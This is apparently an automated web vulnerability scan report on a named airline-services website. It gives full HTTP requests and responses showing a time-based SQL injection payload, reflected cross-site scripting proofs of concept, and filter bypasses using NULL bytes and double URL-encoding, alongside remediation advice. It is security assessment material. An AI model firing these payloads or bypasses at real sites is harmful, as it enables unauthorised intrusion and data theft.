GET /home/products_services/services/consulting_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619%2527; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:23:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/services/consulting_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619%2527%2527; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 4. The application took 24735 milliseconds to respond to the request, compared with 266 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /images/uploads/flash/flvPlayer.swf'waitfor%20delay'0%3a0%3a20'--?width=384&height=328&flashvars=videoPath=cost_centric3.flv&hideLogo=true&newWidth=384&newHeight=328&volAudio=60 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://www.sabreairlinesolutions.com/home/about [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aabbe"><a>a58115eef59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aabbe"><a>a58115eef59 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about?%00aabbe"><a>a58115eef59=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/about?%00aabbe"><a>a58115eef59=1"> ...[SNIP]...
3.2. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/complete_the_picture/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e3fbe"><a>dc36cf7621c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3fbe"><a>dc36cf7621c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/complete_the_picture/?%00e3fbe"><a>dc36cf7621c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/about/complete_the_picture/?%00e3fbe"><a>dc36cf7621c=1"> ...[SNIP]...
3.3. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/copyright_and_trademark/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007b237"><a>8a1a1739deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b237"><a>8a1a1739deb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/copyright_and_trademark/?%007b237"><a>8a1a1739deb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/about/copyright_and_trademark/?%007b237"><a>8a1a1739deb=1"> ...[SNIP]...
3.4. http://www.sabreairlinesolutions.com/home/about/executive_team/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/executive_team/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d1445"><a>c4609654fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1445"><a>c4609654fa0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/executive_team/?%00d1445"><a>c4609654fa0=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd77e%2522%253e%253ca%253e0808e0e2c85 was submitted in the REST URL parameter 4. This input was echoed as bd77e"><a>0808e0e2c85 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /home/about/executive_team/stephen_m._clampettbd77e%2522%253e%253ca%253e0808e0e2c85 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321284; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <body id="stephen_m._clampettbd77e"><a>0808e0e2c85"> ...[SNIP]...
3.6. http://www.sabreairlinesolutions.com/home/about/media_press/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/media_press/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049524"><a>16b0673047b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49524"><a>16b0673047b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/media_press/?%0049524"><a>16b0673047b=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/about/media_press/?%0049524"><a>16b0673047b=1"> ...[SNIP]...
3.7. http://www.sabreairlinesolutions.com/home/about/privacy_policy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/privacy_policy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb01d"><a>04cb2f1cd5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb01d"><a>04cb2f1cd5a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/privacy_policy/?%00eb01d"><a>04cb2f1cd5a=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/about/privacy_policy/?%00eb01d"><a>04cb2f1cd5a=1"> ...[SNIP]...
3.8. http://www.sabreairlinesolutions.com/home/about/sitemap/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/sitemap/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080478"><a>1c4558ae88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80478"><a>1c4558ae88c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/sitemap/?%0080478"><a>1c4558ae88c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/about/sitemap/?%0080478"><a>1c4558ae88c=1"> ...[SNIP]...
3.9. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/the_as_advantage/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b4ab8"><a>1b259e8819c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4ab8"><a>1b259e8819c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/about/the_as_advantage/?%00b4ab8"><a>1b259e8819c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/about/the_as_advantage/?%00b4ab8"><a>1b259e8819c=1"> ...[SNIP]...
3.10. http://www.sabreairlinesolutions.com/home/ascend [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c967d"><a>94f7e2076ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c967d"><a>94f7e2076ed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend?%00c967d"><a>94f7e2076ed=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the search_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff5"><script>alert(1)</script>609319ef91e was submitted in the search_term parameter. This input was echoed as 3eff5\"><script>alert(1)</script>609319ef91e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sort_term request parameter is copied into the HTML document as plain text between tags. The payload 81919<script>alert(1)</script>0c53ea14b3b was submitted in the sort_term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <h3>Issue81919<script>alert(1)</script>0c53ea14b3b</h3> ...[SNIP]...
3.13. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b1c03"><a>05b671b0eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1c03"><a>05b671b0eb5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/?%00b1c03"><a>05b671b0eb5=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/?%00b1c03"><a>05b671b0eb5=1"> ...[SNIP]...
3.14. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00fe06e<a>db887c7418b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe06e<a>db887c7418b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
